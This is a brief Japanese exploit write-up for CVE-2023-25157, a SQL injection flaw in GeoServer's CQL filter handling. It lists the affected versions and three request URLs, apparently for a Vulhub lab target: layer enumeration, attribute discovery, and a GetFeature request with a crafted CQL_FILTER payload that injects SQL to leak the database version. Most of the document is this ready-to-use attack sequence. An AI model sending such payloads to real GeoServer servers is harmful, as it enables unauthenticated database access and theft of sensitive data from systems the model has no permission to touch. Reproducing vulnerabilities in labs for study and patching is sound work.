
CVE-2023-25157 エクスプロイト
ユーザー入力がフィルタリングされていないため、リモートの未認証攻撃者が不正なフィルター構文を構築し、GeoServerの字句解析をバイパスしてSQLインジェクションを引き起こし、サーバー上の機密情報を取得したり、データベースサーバーの権限を取得したりする可能性があります。
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
検索
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

vulhub:example 機能名の関連属性を取得
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



